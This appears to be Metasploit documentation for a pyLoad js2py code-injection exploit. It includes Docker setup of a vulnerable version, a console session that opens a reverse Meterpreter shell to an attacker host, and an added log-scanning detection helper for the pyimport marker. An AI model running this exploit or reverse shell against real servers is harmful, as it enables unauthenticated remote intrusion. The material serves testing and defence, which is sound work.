metasploit-framework/documentation/modules/exploit/linux/http/pyload_js2py_exec.md


Vulnerable Application

pyLoad versions prior to 0.5.0b3.dev31 are vulnerable to Python code injection due to the pyimport functionality exposed through the js2py library. An unauthenticated attacker can issue a crafted POST request to the flash/addcrypted2 endpoint to leverage this for code execution. pyLoad by default runs two services, the primary of which listens on port 8000 and cannot be used by external hosts. A secondary "Click 'N' Load" service runs on port 9666 and can be used remotely without authentication.
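The description above gives a defender two concrete signals: the Click 'N' Load endpoint (/flash/addcrypted2) and the pyimport marker that js2py exposes. The following detection helper, an added example that is not part of the Metasploit module or of pyLoad, scans request logs for POSTs to that endpoint whose form fields contain pyimport; the pipe-separated log format and the sample lines are constructed for the example.

```python
"""Flag HTTP requests that look like abuse of pyLoad's js2py pyimport path.

Constructed log format (assumption): one request per line, fields separated
by " | ":  <client ip> | <method> | <path> | <raw urlencoded body>
"""
from urllib.parse import parse_qs, unquote_plus

# Endpoint and marker come from the module description; the rest is assumed.
CNL_ENDPOINT = "/flash/addcrypted2"
MARKERS = ("pyimport",)


def parse_line(line):
    """Split one constructed log line into its four fields, or return None."""
    parts = [p.strip() for p in line.split(" | ", 3)]
    if len(parts) != 4:
        return None
    src, method, path, body = parts
    return {"src": src, "method": method.upper(), "path": path, "body": body}


def suspicious_fields(body):
    """Return names of form fields whose decoded value contains a marker."""
    hits = []
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            # parse_qs already URL-decodes once; decode a second time so a
            # double-encoded value does not slip past a plain substring match.
            decoded = unquote_plus(value).lower()
            if any(marker in decoded for marker in MARKERS):
                hits.append(name)
    return hits


def scan_requests(lines):
    """Return one finding per POST to the CNL endpoint carrying a marker."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        req = parse_line(line)
        if req is None or req["method"] != "POST":
            continue
        if req["path"].split("?", 1)[0] != CNL_ENDPOINT:
            continue
        fields = suspicious_fields(req["body"])
        if fields:
            findings.append({"line": lineno, "src": req["src"], "fields": fields})
    return findings


# Constructed sample log: a normal CNL submission, a flagged one, and a GET.
SAMPLE_LOG = [
    "10.0.0.5 | POST | /flash/addcrypted2 | passwords=&crypted=abc&jk=function+f%28%29%7Breturn+%27x%27%7D",
    "10.0.0.9 | POST | /flash/addcrypted2 | jk=pyimport+CONSTRUCTED_MARKER&crypted=AAAA&passwords=",
    "10.0.0.9 | GET | /flash/ | ",
]
```

Real deployments should feed the function from whatever access or proxy log actually captures request bodies, since the marker lives in the POST body rather than the URL.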

Verification Steps

  1. Start a vulnerable instance of pyLoad using docker
  2. Start msfconsole
  3. Run: use exploit/linux/http/pyload_js2py_exec
  4. Set the RHOST, PAYLOAD and payload-associated options
  5. Run: run

Docker Setup

docker run -d \
  --name=pyload-ng \
  -e PUID=1000 \
  -e PGID=1000 \
  -e TZ=Etc/UTC \
  -p 8000:8000 \
  -p 9666:9666 \
  --restart unless-stopped \
  lscr.io/linuxserver/pyload-ng:version-0.5.0b3.dev30

Options

Scenarios

pyLoad 0.5.0b3.dev30 via Docker

msf6 > use exploit/linux/http/pyload_js2py_exec 
[*] Using configured payload cmd/unix/generic
msf6 exploit(linux/http/pyload_js2py_exec) > set RHOSTS 192.168.159.128
RHOSTS => 192.168.159.128
msf6 exploit(linux/http/pyload_js2py_exec) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp
PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/pyload_js2py_exec) > set LHOST 192.168.250.134
LHOST => 192.168.250.134
msf6 exploit(linux/http/pyload_js2py_exec) > exploit

[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Successfully tested command injection.
[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
[*] Sending stage (24380 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (192.168.250.134:4444 -> 172.17.0.2:40830) at 2023-02-15 15:28:52 -0500

meterpreter > getuid
Server username: abc
meterpreter > sysinfo
Computer     : f03ec089a4fe
OS           : Linux 6.0.18-200.fc36.x86_64 #1 SMP PREEMPT_DYNAMIC Sat Jan 7 17:08:48 UTC 2023
Architecture : x64
Meterpreter  : python/linux
meterpreter > pwd
/config/data
meterpreter >